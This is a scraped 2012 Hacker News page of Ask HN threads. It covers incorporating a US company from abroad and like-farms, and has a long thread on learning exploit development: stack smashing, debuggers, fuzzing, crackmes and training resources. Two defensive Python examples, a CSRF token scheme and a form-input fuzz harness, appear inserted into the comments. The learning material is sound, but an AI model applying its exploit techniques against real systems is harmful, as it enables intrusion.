hacker news with inline top comments    .. more ..    18 Jun 2012 Ask
1
Ask HN: Best iOS resource for non-iOS-developers?
4 points by sofuture  1 hour ago   2 comments top 2
1
OiNutter 1 hour ago 0 replies      
I learnt a lot from the Stanford online courses on iTunes U. Granted they are video lessons, but you can also grab all the lecture notes and sample code from this link:

http://www.stanford.edu/class/cs193p/cgi-bin/drupal/download...

Other than that I just googled the hell out of things, Stack Overflow was, as always, a valuable resource. Chances are that whatever you're trying to do, particularly when learning, somebody else has already done.

3
Ask HN: What is the point of 'likefarms'
2 points by Irishsteve  2 hours ago   1 comment top
1
Piskvorrr 2 hours ago 0 replies      
Amass some followers, then sell the likefarm (for a few cents per follower). The new owner will then replace the likefarm's content with their brand or whatever they wish - and it will look as if the brand has X hundreds of followers.

This practice is in violation of FB's ToS, and ethically questionable - but there's just enough money in it to make this worthwhile for the likefarmers.

4
Ask HN: How to setup a company in U.S. without being there?
172 points by ahmedaly  1 day ago   65 comments top 19
1
Maro 1 day ago  replies      
Disclaimer: I'm not a lawyer or accountant, and this is not legal or accounting advice.

I recently created a US company. Here's what I learned:

Most companies are set up in Delaware, because of Delaware's taxation and advanced corporate legal system. Setting up (and shutting down) a company in Delaware is very simple and streamlined, and most big US corporations are technically Delaware corps.

If there's a chance of raising US VC capital in the future, you will want to create a Delaware "C" Corporation, specifically. Many VCs will demand that you create a "C" Co. and transfer IP/business if you had another Co. previously. Ownership in a "C" Co. is based on shares, and the "C" Co. can later release and sell new shares to VCs: that's how investment deals happen in a nutshell.

To set up the company, we used a lawyer. After shopping around, $300/hr is what you should be prepared for, with about 10-20 hr to set up the "C" Co., another 10-20 if you want to transfer IP. Also, if your existing Co. is located in say Egypt, you'll need Egyptian legal counsel to cover your ass on that end (VCs will demand Egyptian legal opinion for transfer of IP).

Once you have the company, you will need an EIN. That is simple and can be completed using a website for a Delaware Co. Then you need to open a bank account. In our case a US based partner did that at his local bank. There's an outfit called Bank of Silicon Valley who seem to be helpful in cases like yours and you can open an account with them, over the phone. Then you will need a virtual office and mail forwarding services, such services exist for Delaware Co's for a low yearly fee (~$50/mo), your lawyer will set you up. You'll also need a US accountant. Btw. your US lawyer will give you all this information. Overall you should expect to spend $10-20K on this.

In practice, the whole thing is pretty simple, and can be managed through email (scans for signatures), and US businesses are used to this. The whole thing can be completed in 1-2 weeks from the point of making initial contact with the US lawyer. Although lawyers have a bad reputation, I found that most lawyers are usually very professional and upfront about what they will charge and what the process will be, what to expect. If you need a contact, try http://wsglegal.com; they are who we were recommended, used, and were very happy with. (I'm not affiliated).

So far so good, what sucks is the accounting / tax issues. That's where you will waste most of your time, esp. if you are based in Egypt. In our experiences, while lawyers are pretty professional about what they do, accountants are less so, and accounting/tax issues are the worst offenders for wasting valuable time. That's where you should be prepared for shit to hit the fan initially, esp. for international issues where neither side (US/Egypt) will have complete legal/accounting/tax knowledge. Your cheap plain vanilla local accountant will be useless.

Finally, you should know that the USA is a very litigious country, meaning people are more likely to sue you if they feel you owe them or you've wronged them. So once you have a US presence (a US Co.), customers and business partners, sooner or later shit _will hit the fan_ and you will probably get sued. It's the cost of doing business.

Overall, in my experience, if you don't want to raise US capital, I would suggest you do _not_ set up a US Corp. Staying local, and having to only deal with local legal/accounting/tax issues is _much_ simpler for you. Also, if your company is based in Egypt it's probably harder to sue you. I would invest major energies in trying to figure out how to take payments as an Egyptian entity, although admittedly I don't have much experience in this. You could also look into setting up a UK Co., I know people who did that to take payments.

The EverWrite guys have a nice writeup here:

http://everwrite.com/opening-a-delaware-corporation-an-incor...

2
ari_ 23 hours ago 0 replies      
Ahmed,
The issue is not setting up the company - what Maro describes below is a long and unnecessary way for most small companies to start up an American company. It can be done for 2 - 400 just to form the company. If you are seriously contemplating VC, then you need a lawyer.
I would also agree with Maro about accountants :)

Anyway, the issue is that no merchant account will accept your US company, even if it has an EIN and a bank account, without a personal guarantee. And they won't accept a personal guarantee unless they can either:
1. Pull your US credit report (which you don't have)
2. Be assured you have some assets that are within reach of the US judicial system
or 3. take a huge rolling reserve off of your payments.

I would strongly suggest using 2CO, Paypal to get started. Too often we get involved in the paperwork and other stuff without proving the MVP.

Good luck from due east.

3
nirvana 23 hours ago 0 replies      
Incorporating in the USA varies by the state, and there are implications based on which state you incorporate in. For instance, some states have no corporate income tax, others do (which is completely separate from federal taxes.) Various states have different amounts of regulation, licensing you might need (depending on your business) and different burdens of bureaucracy to deal with. Just something to be aware of. You'll need to at least file annual reports and pay a fee each year to keep the corporation going, though there may be other paperwork you have to keep up too.

The company corporation exists to provide most of the services you need. You can find them at www.incorporate.com They are good about reminding you of everything you need to file, and they also provide registered agent services. Every company needs to have someone in the state where they are incorporated who is there to receive process (e.g.: if someone sues you you have to have an agent who is identified publicly so you can get the court papers.)

They provide registered agent services and will facilitate incorporating in many of the states.

If you decide you need a mailbox in the USA, then there's earthclassmail.com which will offer you addresses in many states. I'm not sure what they require for non-american citizens to set up an account.

4
speleding 4 hours ago 0 replies      
If you just need a way to get paid then there are better ways than setting up a company. You could easily waste a lot of time there.

The way I branched out my company into unknown territories is to find a reseller there. Let them take care of the regulatory stuff. In this economy it should be easy enough to find someone who already has the company in place and needs some extra work on the side.

You can set up the contracts in such a way that you retain the option to buy them out and set up your own company at some point in the future.

6
mmaunder 17 hours ago 2 replies      
I did this before I became a citizen and before I had residency. Trust me: You only have one minor problem right now and it's not having a merchant account. Focus on solving that. Setting up a US corporation is a world of expense, complexity and hurt you don't need. The issue goes beyond the obvious, for example it's likely you'll be refused entry to the USA on a tourist visa if you're a shareholder and director of your own USA C corp. [No it's not documented anywhere so don't bother Googling]
7
neya 10 hours ago 0 replies      
Hi Ahmed, Here's my experience - I'm not a lawyer or anything, but I run one (an American LLC).

1) Ask yourself WHY you need a company in the US. It might not be worth it.

I registered one so that 1) it would be easier to accept payments from the US through their native gateways, because in my country, all of them suck. But if I had known the pitfalls first, I would rather have integrated with Paypal.

2) An American company's products are always perceived to be better than the rest.

I registered an LLC and every year, I'm required to pay an annual fee of $250 USD as Franchise tax. Mine is in Delaware so it's just $250; if it's in California, it's going to be approx. $800 or so. $250 might not sound like a big deal, but for companies like mine, that are bootstrapping, it really is.

You are required to pay some more money as tax, apart from the Franchise tax on your ECI. ECI is effectively connected income - ie, The income generated by doing business with the US. This is going to get complex if you have an online internet business model.

You are required to have a registered agent to represent your company in Delaware. They charge anywhere from $50 to $200 a year.

The total tax you might end up paying for the same revenue stream is:

Franchise tax + tax for your ECI + registered agent fee + your local country's tax.

The situation gets even more complex when you hire more people.

Also, the organization's taxation methods change depending on the number of members (single/partnership/multi-member, etc.)

More on this:
http://www.irs.gov/businesses/small/article/0,,id=98277,00.h...

The worst part is, if someone decides to sue you, suddenly you are answerable to the American government, which you were not before. Your liability is also increased (unsure of this though).

Travelling to the US becomes a nightmare when you own an American company. Visa officers think you have a higher probability of settling there, rather than returning and it becomes increasingly difficult to get to the US, which I'm pretty sure is not what you want.

FYI:

I registered through a known friend, but the best place to get it done, if you ask me, is through Harvard business services (www.delawareinc.com). They have a lot of benefits (total cost to set up an LLC is under 600-700$ USD) and MANY of my friends have registered through them. They also are very transparent and their registered agent fee is only $50 a year! (I'm not their salesman though, for god's sake)

Anyway, If I had known these disadvantages first, I might as well have gone with a local organizational structure. Just keep these in mind while registering your new company... my 2 cents.

8
cmer 1 day ago 0 replies      
This article from my blog might help.
http://blog.carlmercier.com/2011/08/29/us-incorporation-for-...

It's more geared towards Canadians but I'm sure many things apply.

9
gte910h 11 hours ago 0 replies      
You'll be eaten alive by taxes if you're not careful, but yes, you can do it.

Law firms help do this. For a few grand you can get someone like http://www.grellas.com/ to do it 100% venture capital ready in Delaware.

If you're really just looking for a merchant account, make an LLC and get one in the name of that. Far cheaper, but will require the redo when/if you want investment.

Make sure you file the paperwork to do its taxes like a C corp instead of a disregarded entity (Form 2553) http://www.irs.gov/pub/irs-pdf/f8832.pdf

10
yashchandra 22 hours ago 0 replies      
Since I own a small business (freelancer 1 man company), I can assure you that if the idea is just to save money on international merchant account etc, the OP should do more research about cost and benefits. To set up any corporation in the US, there are multiple steps which also include cost. Do not go for the online ads that claim you can set up a company for $100. There are far more things like state filing etc. that are usually not included in those. Not to mention that you will be dealing with one of the most dreaded income tax collectors (a.k.a IRS in the US). I say this having lived in 3 different countries including the US.
If you absolutely need a foreign company outside Egypt, look into Asia (Hong Kong or Singapore preferably).
11
hackrocket 7 hours ago 0 replies      
Can anybody recommend a good US CPA and an accountant with experience in working with tech startups?

If you are looking for a lawyer I received good recommendations for:

- Ryan Roberts @ http://startuplawyer.com/contact

- Scott Edward Walker @ http://walkercorporatelaw.com/

- Grellas Shah LLP @ http://www.grellas.com/

12
Dystopian 1 day ago 1 reply      
If I was to look for creating an offshore corp I'd look at Hong Kong as opposed to Delaware, mostly for litigation reasons, to a lesser extent tax reasons. corps are pretty standard in both jurisdictions though. You'll be looking at around 10K-15K for setup and around 1K-2K a year in management / accounting fees. If you can find a lawyer / accountant in your jurisdiction that specializes in this they usually have preferred agents they work through to get you set up.
14
tszming 1 day ago 1 reply      
Is it really a good idea for a foreign startup to set up a US company just because of handling recurring payments for international customers, even including the factor of US tax?
15
alemhnan 1 day ago 0 replies      
I found that article here in HN some months ago: http://www.pluggd.in/incorporating-company-in-usa-from-outsi...

There are some useful info on that article. Nevertheless if someone has more info I would like to know different perspectives on that topic.

16
sathishmanohar 23 hours ago 3 replies      
Let's say I incorporate as an LLC, and decide down the road to take investment, can it be done? Can an LLC be changed to a C-Corp later?
17
pajju 1 day ago 0 replies      
18
startupsdesigns 1 day ago 0 replies      
You might be able to find answer to your question by contacting these guys. Hope it helps.

http://www.ready2inc.com/outsideUS.asp

19
melvinmt 1 day ago 1 reply      
It's not possible to open a bank account without being here in person (due to Patriot/Anti-Terrorism Acts). Other than that, there are many companies who can help you to get incorporated just by e-mailing papers back and forth.
5
Ask HN: Open source commenting systems for static pages - alternatives to Juvia?
4 points by przemoc  5 hours ago   1 comment top
1
sdoering 4 hours ago 0 replies      
Greetings from Germany,

as I am preparing the switch to a static site, I hope, there are interesting answers waiting out here.

Juvia is interesting, but - as you said - a bit overweight. ;-)

So I hope, that there do exist interesting alternatives, but till now, I didn't find any.

6
Ask HN: How do you learn to develop exploits?
155 points by bcattle  1 day ago   75 comments top 35
1
saurik 1 day ago 3 replies      
I would argue the magazines (such as 2600, which I absolutely loved when I was young) and books and oral tradition are all just ways of passing around specific and awesome anecdotes: it doesn't teach you how to do that, it is just interesting facts or entertainment for people who know.

What you need, instead, is a mindset: when you are at the supermarket checking out with one of those self-checkout machines, does some part of your brain start figuring out mistakes made in the mechanism that might allow someone to steal items?

If not, that is the kind of thought process that you need to get yourself to start doing: you need to keep asking yourself "if I were evil, could I do something evil here?", and you need to make it fun enough that you are doing it constantly.

With this mindset, finding exploits in software just becomes "teach me to program", as the kind of devious backchatter in your brain will just see things popping out "wait, what's to keep someone from cheating here and doing the opposite of what you say?".

The really epic hacks then just come from many years (the stereotypical 10,000 hours) of experience programming and trying things: it isn't because they read some magazine or learned from someone else. Instead, their mindset just got better.

Think of it this way: it makes a lot of sense to ask "how do I learn how to use a violin", but "how do I learn musical taste" and "how do I learn to hear music in everything that surrounds me" are more awkward. The former is a skill, the latter two are mindsets.

2
dhx 1 day ago 0 replies      
The following comment will likely be deemed controversial—but also critical to understanding how the open source community operates with respect to security issues.

Recognise that a lot of hype and circus has built up around the field of ICT security. Linus made a very public and passionate argument in mid 2008 on the topic. Some sample quotes:

  So I personally consider security bugs to be just "normal bugs". I don't
cover them up, but I also don't have any reason what-so-ever to think it's
a good idea to track them and announce them as something special.
...
To me, security is important. But it's no less important than everything
*else* that is also important!

―Linus Torvalds[1]

Part of Linus' argument stems from the bazaar[2] model for developing software. A separate security ecosystem that works in secret and controls the distribution of source code is a throwback to the cathedral[2] model. Linux continues to be a success because it does not use the cathedral model.

Linux development occurs in the open amongst many selfish parties that sit anywhere on the scale between not caring at all about security to being paranoid about security at the exclusion of all other interests. In the middle of this disorder is someone like Linus who is trusted by the community to balance interests. On one side of the debate is PaX/grsecurity (or similar projects) lobbying for more controls and security features in the kernel. This party is generally happier to trade off factors such as performance and ease of kernel maintenance to gain additional security. The other side of the debate may be supercomputing users or embedded platforms who are not willing to trade off performance.

The security hype and circus around security-related bugs can be very dangerous to the ongoing health of open source software projects. I will use the personal example of Mantis Bug Tracker—a project I have contributed to for the past few years. Many of the contributions I have made to the project are security related—XSS, CSRF, access control, cryptography and more[3]. The CSRF protection in particular is a disgrace within Mantis Bug Tracker—for reasons unrelated to security. A few years ago, some forms within MantisBT were protected by CSRF nonces. Obviously this is not a good situation—every form which results in changes to state or data should be protected. I went through every form (grep -PRn "<form") and added nonces. Great! MantisBT was secure. But it was also very much broken. Numerous users started complaining about security error messages informing them of invalid tokens and the incorrect possibility that they submitted a form twice. The cause? PHP session time-outs were invalidating CSRF nonces and not only prevented users from submitting lengthy bug reports and comments but also led to the loss of that user supplied information. The trade-off between security and usability was (and sadly, still is) broken.

When usability is broken to the detriment of security, the natural and completely understandable user decision may be to disable form CSRF security altogether or switch to another piece of bug tracking software that is less secure—but also more usable. This is a security failure worth being concerned over.

The bazaar model calls for these issues to be thrown out in public on project mailing lists, bug trackers and source code repositories in the hope that a maximum number of eyes will look over the issue and feel a compulsion to assist with patches in the shortest period of time. Hopefully usability issues about any proposed patches are considered as part of this process, preventing the problem I mentioned above with CSRF nonce time-outs. The cathedral model on the other hand prefers to keep these issues secret amongst a select group of self-titled “experts” (core developers or otherwise). The chance of a quick resolution amongst this small group is smaller than if the issue was public with hundreds of eyes looking upon it. There is also a much greater chance that a small highly biased group will fail to correctly consider all the trade-offs.

In summary,

* Recognise that security is a trade-off against other factors and a balance needs to be struck. Bruce Schneier has been repeating this statement for over a decade on his blog. Linus has been proclaiming it on the Kernel mailing list. It is important.

* Know what the bazaar model of software development is, how it works and why the concept of secret walled-garden development communities in a much larger open source project can be considered offensive.

* Software developers have many “most important” problems to deal with at any time and are often volunteering their time. A bad, demanding attitude from a security researcher will not help.

* Security patches do not warrant a Millennium Prize any more so than a patch to resolve a severe performance regression, data loss bug or major usability issue. Standing on top of a security pedestal in the sky is the antithesis to gaining respect from open source communities.

* Study the work of programmers who are well respected for their knowledge and experience with creating secure software. Some examples are Daniel J. Bernstein (djbdns amongst numerous other projects), Chris Evans (vsftpd), Timo Sirainen (Dovecot), Wietse Venema (Postfix) and Igor Sysoev (Nginx). If you want to make a contribution to ICT security there is no better way of doing it than creating your own secure-by-design software that is relied upon by billions of Internet users each day. The adversarial mindset is important but is not worth much without an ability to practically implement constructive changes.

[1] http://kerneltrap.org/Linux/Security_Bugs_and_Full_Disclosur...

[2] http://www.catb.org/~esr/writings/cathedral-bazaar/cathedral...

[3] Refer to oss-security@lists.openwall.com, mantisbt-dev@lists.sourceforge.net, http://www.mantisbt.org/bugs/search.php?project_id=0&cat...
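The session-timeout failure dhx describes, as an added example in Python that is not MantisBT's code: each token is an HMAC over the user id, form id and issue time under a server-side secret (a constructed value here), so its lifetime is independent of the PHP session, and a submission carrying a stale token is handed back for re-display with the user's text intact rather than discarded. The four-hour lifetime and the user-id binding are assumptions chosen for the example.

```python
import hashlib
import hmac
import time
from typing import Dict, Optional, Tuple

# Constructed server secret for the example; in practice it lives in server
# configuration, never inside the PHP session that may time out.
SECRET_KEY = b"constructed-example-secret-do-not-reuse"
# Assumed token lifetime: long enough to outlive a typical session timeout.
TOKEN_MAX_AGE = 4 * 3600


def _mac(user_id: str, form_id: str, issued_at: int) -> str:
    # Bind the token to the authenticated user and the specific form, not to
    # the session id, so a session expiring mid-edit does not void the token.
    msg = f"{user_id}|{form_id}|{issued_at}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def make_token(user_id: str, form_id: str, now: Optional[int] = None) -> str:
    """Issue a token of the form '<issued_at>:<hex mac>'."""
    issued_at = int(time.time()) if now is None else now
    return f"{issued_at}:{_mac(user_id, form_id, issued_at)}"


def check_token(user_id: str, form_id: str, token: str,
                now: Optional[int] = None) -> str:
    """Return 'ok', 'expired' (genuine token past its lifetime) or
    'invalid' (malformed, forged, or issued for another user/form)."""
    now = int(time.time()) if now is None else now
    try:
        issued_str, mac = token.split(":", 1)
        issued_at = int(issued_str)
    except (ValueError, AttributeError):
        return "invalid"
    # Constant-time comparison; the MAC covers issued_at, so the timestamp
    # in the token cannot be edited to extend its life.
    expected = _mac(user_id, form_id, issued_at)
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return "invalid"
    if issued_at > now or now - issued_at > TOKEN_MAX_AGE:
        return "expired"
    return "ok"


def handle_submission(user_id: str, form_id: str, fields: Dict[str, str],
                      now: Optional[int] = None) -> Tuple[str, Dict[str, str]]:
    """Outcome is 'accepted' (payload = fields to save), 'retry' (payload =
    the user's fields plus a fresh token, to be re-rendered so nothing they
    typed is lost) or 'rejected' (empty payload, likely a forgery)."""
    status = check_token(user_id, form_id, fields.get("csrf_token", ""), now)
    data = {k: v for k, v in fields.items() if k != "csrf_token"}
    if status == "ok":
        return "accepted", data
    if status == "expired":
        # The usability fix: keep the lengthy bug report, just renew the token.
        data["csrf_token"] = make_token(user_id, form_id, now)
        return "retry", data
    return "rejected", {}
```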

3
Hrundi 1 day ago 0 replies      
You may have fun building fuzzers. You just feed all kinds of varied, random data to your app. If you only expect numbers, try and see how your app behaves if you feed it large or negative numbers, strings in certain charsets.

You'd be surprised to see the amount of apps that accept a single non-breaking space (alt + 0160) as a username.

Don't assume that a disabled, unchecked checkbox in a registration form can't be enabled/checked.
Don't expect that you'll receive a value from a <select> element that is actually contained within that dropdown's options.

When your app breaks horribly, your curiosity will hopefully throw you into a night of reading and hacking.

You can read more about fuzzing at Jesse Ruderman's blog[1]. He wrote very interesting fuzzers for Mozilla's JS, DOM and CSS parsers.

Sometimes, a friend of mine would ask me to check out his project. I proceed to act like an incredibly malicious user, then have this friend get mad at me.

It all clears out after explaining that he would always run into someone trying to break things. Even someone just trying to get a laugh!

[1] http://www.squarefree.com/categories/fuzzing/
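Hrundi's checks, as an added example that is not code from any project on the page: a small fuzz harness runs constructed mutations of a constructed registration form against a naive validator that mirrors PHP's trim() semantics and against a strict one that derives every rule from the server's own form spec rather than from what the browser rendered.

```python
import unicodedata
from typing import Callable, Dict, List

# Constructed form definition; not taken from any real application.
FORM_SPEC = {
    "username": {"min": 3, "max": 32},
    "age": {"min": 13, "max": 120},
    "country": {"options": {"US", "DE", "EG"}},
    "newsletter": {"disabled": True},  # rendered disabled: a real browser never submits it
}

# Characters PHP's trim() removes; NBSP (U+00A0) is not among them.
PHP_TRIM_CHARS = " \t\n\r\0\x0b"


def naive_validate(form: Dict[str, str]) -> List[str]:
    """Trusts the client: the kind of checks Hrundi's inputs slip past."""
    errors = []
    if not form.get("username", "").strip(PHP_TRIM_CHARS):
        errors.append("username")
    if not form.get("age", "").isdigit():  # range never checked
        errors.append("age")
    # country and newsletter are assumed to be whatever the HTML offered
    return errors


def strict_validate(form: Dict[str, str]) -> List[str]:
    """Server-side rules from FORM_SPEC, independent of the rendered HTML."""
    errors = []
    name = unicodedata.normalize("NFKC", form.get("username", ""))
    # Drop every whitespace, format (zero-width) and control character before
    # measuring, so NBSP-only or zero-width-only names count as empty.
    visible = "".join(c for c in name
                      if not c.isspace() and unicodedata.category(c) not in ("Cf", "Cc"))
    spec = FORM_SPEC["username"]
    if not (spec["min"] <= len(visible) <= spec["max"]) or not any(c.isalnum() for c in visible):
        errors.append("username")
    raw_age = form.get("age", "")
    # ASCII digits only: int() would also accept '+5', '1_0' and non-ASCII digits.
    age = int(raw_age) if raw_age.isascii() and raw_age.isdigit() else None
    if age is None or not (FORM_SPEC["age"]["min"] <= age <= FORM_SPEC["age"]["max"]):
        errors.append("age")
    if form.get("country") not in FORM_SPEC["country"]["options"]:
        errors.append("country")
    if FORM_SPEC["newsletter"]["disabled"] and "newsletter" in form:
        errors.append("newsletter")  # a disabled control must never arrive
    return errors


# Constructed well-formed submission used as the base for every mutation.
GOOD = {"username": "alice", "age": "30", "country": "DE"}


def edge_cases() -> Dict[str, Dict[str, str]]:
    """Constructed mutations, one per assumption a hostile client can break."""
    return {
        "nbsp_username": {**GOOD, "username": "\u00a0" * 4},
        "zero_width_username": {**GOOD, "username": "\u200b" * 3},
        "huge_username": {**GOOD, "username": "a" * 10_000},
        "negative_age": {**GOOD, "age": "-5"},
        "huge_age": {**GOOD, "age": "9" * 30},
        "float_age": {**GOOD, "age": "1e3"},
        "select_not_in_options": {**GOOD, "country": "XX"},
        "disabled_checkbox_set": {**GOOD, "newsletter": "on"},
    }


def fuzz(validator: Callable[[Dict[str, str]], List[str]]) -> List[str]:
    """Names of the edge cases the validator wrongly accepts."""
    return sorted(name for name, form in edge_cases().items() if not validator(form))
```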

4
crankyadmin 1 day ago 6 replies      
Read as much as you can about assembly. Debuggers are your best friend. Pick a target (app, iPhone, xbox, whatever). Attach debugger and step through the code and learn possible entry vectors (buffer overflow, loading for arbitrary file i.e. pdfs, so forth). Once you have an entry vector you essentially have an exploit, the rest is developing that exploit to do something "useful".

Sorry for the shortness of this response, if people are interested I can throw together a couple of blog posts.

5
rschmukler 1 day ago 1 reply      
"Smashing the stack for fun and profit" is absolutely a great introduction to the classic buffer overflow attack. It is also the foundation on which tons of exploits are built on: http://insecure.org/stf/smashstack.html

Once you've read that, I highly recommend going through Stanford's CS 155 practice assignment on the subject. Unfortunately I really can't find the assignment anymore but perhaps a more thorough search of their archives would reveal it.

However, here is a blog which details the answers to all of the problems and includes the problem themselves. It explains why they work, and how to get to them. Very helpful if you are interested in looking at more advanced techniques: http://blogs.hulmahan.com.ph/archives/category/hack-101

That takes care of the basic C sploits. Beyond that, it really depends which level you want to attack at. You can attack at the stack level for almost all programs.

For web applications, you can go at a much higher level with stuff like SQL Injection, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), and Session Hijacking.

Lastly, I highly recommend "Grey Hat Hacking, The Ethical Hacker's Handbook." This book does a fantastic job of giving you a taste of hacking at all levels. It covers OS attack possibilities, network level attacks, exploit generation and more. It also does a great job of introducing you to a lot of tools that help get the job done. From there, you'll at least be able to think of what you want to learn about next.

6
mmaunder 17 hours ago 0 replies      
Hanging out on boards, IRC, reading hacker publications will get you access to exploits of others. If you want to develop your own zero day exploits you need to become a really really great programmer. Then gain an understanding of the layers that live between the publicly accessible part of an application and the core system you want access to (usually the OS). Learn everything you can about those layers and how the creator has protected the system from unauthenticated users.

Sometimes you're dealing with completely open source apps. These are more secure but the plus side is that you have access to all uncompiled source code.

Sometimes you're dealing with all or part of the stack that is proprietary. These are sometimes less secure but you don't have access to easily readable source code so you need to use special tools to figure out what the creator has done to protect the system.

If you're trying to get into a specific system, intuition often helps you choose where to spend your energy first. You'll have a feel for what code has the least eyeballs on it or the less competent developers writing it, or less frequent updates so you look there first.

FYI there are two kinds of zero day exploits. The first is one you just discovered and no one knows about it. I think of that as true zero day. The second is one that fits the classical definition of the developer having zero dev days to fix it because they haven't been told yet, but many other folks may know about it. Discovering a true zero day security hole is very hard and getting harder because of the bounties being offered now. Often regular zero day holes are discovered by others who got hacked using it and simply back-tracked the hackers steps.

Hope that helps. I'm the developer of Wordfence, a security plugin for WordPress. Also disclosed the timthumb wordpress vulnerability last year and fixed the hole by rewriting timthumb.

7
danso 1 day ago 0 replies      
A lot of it is an understanding of human behavior, right? Especially one of other programmers. I once had to find a file that a company was compelled to publish but then replaced with a different version after a certain time period. The company said that this was legally fine but rather than argue about it, I just looked at the source code and saw that the href of the currently published file had "2" appended to it, as in, "list2.xml"

I knew from past experience that the company had hired someone to basically just make a separate site to host the damn file...in other words, the PR department had minimal knowledge/care about the technical details of the website.

And knowing how contract developers worked...that is, they know that if their client no longer sees a visible link to a file, then that file has been "deleted"...I just tried something like "list1.xml"...and voila

I know buffer overflow hacks are incredibly interesting but how many of the most significant hacks have been done through plain out guessing the target? I don't even mean social engineering...take, for example, the update_attributes hack on Github's rails setup. The vulnerability was well known and dismissed, so the hacker guessed how a project team might slip up and perpetuated an amazing and thankfully benign hack.

So I guess, a good start is to just be a decent programmer yourself, and to have understood why you follow the best practices

9
stiff 1 day ago 0 replies      
Maybe a fun way to get started would be taking an old version of a shitty server of some service and try to find possible ways of breaking it by examining the source code. There are really thousands of assumptions each computer program makes about the external world and security research seems to work by giving those assumptions an examination much closer than the original programmers gave.

In the end I don't think there is too much to say about "exploit development" per se, it's all about identifying those assumptions that could be fruitfully abused, once you find a way, writing the exploit should be the easy part. So, I would take some amateur ftp server, or maybe something famous for its insecurity (I know wuftpd used to have a bad rep) and then basically try writing an FTP client that tries to break some restriction the server or protocol intended to keep. From there, you just have to learn to identify more assumptions, by studying programming languages, operating systems, network protocols etc., whatever might be helpful (and it always amazes me what kinds of crazy details people in security can take advantage of). Another aspect is exploring the assumptions of software you don't have the source code of, so basically reverse engineering.

I am more of an admirer of security work than a practitioner, so maybe other people can elaborate some more, but I hope this is a valuable starting point.

10
ihodes 1 day ago 1 reply      
tptacek (of Matasano) has a list of books on Amazon he has suggested for learning just that: http://www.amazon.com/lm/R2EN4JTQOCHNBA
11
iuguy 1 day ago 0 replies      
Vivek Ramachandran's Exploit Research Megaprimer[1] is a good video series for the basics. Peter van Eeckhoutte's article series[2] also provide a good hands on for getting started. Vivek's doing a training course at 44Con (disclaimer: I'm one of the organisers) that covers some of this[3] and looks quite promising but if London's a bit of a stretch you should be able to find training courses at conferences closer to home.

The Shellcoder's handbook is a good starting point too but is getting a bit long in the tooth. Attacking the core is a good starter on kernel bug dev. Both should be available on Amazon.

It's also worth pointing out that if you have a local Def Con chapter it's worth going at least once or twice to see whether or not you like it. Same if there's a local BSides event - these are free events, wildly variable in quality but run by the community for the community. There's also other cons like 44Con, Brucon, Cansec, Defcon etc. if you really want to get into it but these can be quite expensive.

I'm not sure where you're based, but if you're in or near London the local Def Con chapter DC4420[4] is on Tuesday downstairs at the Phoenix, Cavendish square near Oxford Circus. I'll be there and will be more than happy to have a chat with you and introduce you to people.

[1] - http://www.securitytube.net/groups?operation=view&groupI...

[2] - http://www.corelan.be/index.php/articles/

[3] - http://44con.com/training/vivek-ramachandran-hacking-with-py...

[4] - http://dc4420.org/

12
raverbashing 1 day ago 0 replies      
Here's my suggestion

You create a toy exploitable program, and you start exploiting that

But before that, brush up on C and assembly (the basics of assembly at least). x86 is "easier" (more human readable I'd say but lots of quirks if you want to write, but easier than x86 in 16bit) but if you want to study exploits in other platforms they have some quirks.

That's "exploits 101" let's say. That will cover the most basic tools you'll need and trying that is a great exercise

See the links others posted for "smashing the stack for fun and profit"

After that, you could try old programs and studying known exploits for specific versions (say program X has a certain exploit that works like that, so you could try making an exploit for that)

13
trotsky 1 day ago 1 reply      
The way most folks learn to do high end niche programming: In advanced degree programs, research organizations and through professional development at government employers / contractors.

Charlie Miller is a well known example of this - he famously markets himself as a reliable exploit writer, his background came from doing the same work at the NSA.

In most cases it's a very technically challenging effort, beyond what most people will self teach. Simply finding the bug is often the easy part as compared to reliable exploitation.

The best publicly accessible sources of learning are security conference papers and university theses, though they don't usually explain the basic techniques or high level techniques. "Underground" sources like 2600 for the most part publish rather poor or incomplete material, though they occasionally do have some top notch stuff.

I assume this is related to the old Andy Greenberg article that's on HN right now. While I wouldn't say those prices are an outright fabrication, it is definitely misleading. It is very rare for those kind of prices to get paid, at least reliably. It's much more common for prices to be in the four or low five figures ranges when sold and often go completely unsold. It has a lot to do with who the buyer is and what their budgets are like and how well known you are and on and on - not totally unlike a traditional governmental procurement process.

What that article really was was an advertisement for that broker - the price list was there because he's trying to say hey you're getting screwed come to me! I would guess that the reality of working with him is significantly more middle class.

14
ElliotH 1 day ago 2 replies      
http://exploit-exercises.com/ has a good virtual machine that you can exploit in your own time. I enjoyed working through Nebula.
15
dguido 1 day ago 0 replies      
I would say the master->apprentice relationship is quite common.

I'm surprised that no one mentioned my class yet, where I have some of the best people in the world talk about exactly how to learn this stuff.

http://pentest.cryptocity.net

http://pentest.cryptocity.net/careers

16
SoftwareMaven 1 day ago 1 reply      
I've got http://exploit-exercises.com/ bookmarked, but haven't had a chance to start the exercises yet.
17
attheodo 1 day ago 1 reply      
Ideally you have to master a low level language like C, socket programming and assembly on various architectures. You can somehow get away with a scripting language like perl or python and drop-in shellcodes but I suggest you do it the hard way.

You can start reading the classics (although most of them not applicable today) like Smashing the Stack for fun and profit by Aleph One, 7350 (teso security group) papers on format-string exploitations as well as various other techniques on heap overflow techniques, double free()'s etc. A very good book for all round exploitation with some advanced techniques is "The Shellcoders Handbook" which I highly recommend. The Phrack magazine (before the editing team changed) has some really juicy techniques on exploiting various platforms.

Other than that, you should browse through A LOT of source code trying to identify bugs in open source software and subscribe to various security bulletins so you can read advisories and try to exploit them. GDB is your best friend for that job since analyzing core files is the beginning of everything.

Finally you should get involved in security communities (the more under the ground they are, the better) and attend security cons (HAL, Defcon, CCC).

I used to do some heavy exploit writing back in high-school and I can tell you it's really REALLY fun but time-consuming and frustrating sometimes. Exploiting software is a form of puzzle solving.

18
makmanalp 1 day ago 0 replies      
For in depth technical work, try doing "crackme" puzzles. Google for them and you'll find some. Also, take a look at fravia's pages (I wonder if he's still alive?)

Edit: http://www.woodmann.com/fravia/

19
jiggy2011 1 day ago 0 replies      
Depends on what you are trying to exploit I imagine, there are a huge number of different techniques out there.

Have a look at http://www.securityfocus.com/archive/1

and if you can get some sample exploit code and study it.

Then perhaps study some of your own programs with a more devious mindset and figure out what you have forgotten to take into account.

20
arihant 1 day ago 1 reply      
Get very good with the instruction set. Get very good at gdb. Then learn about memory management and networking protocols. Look up networking libraries in C.

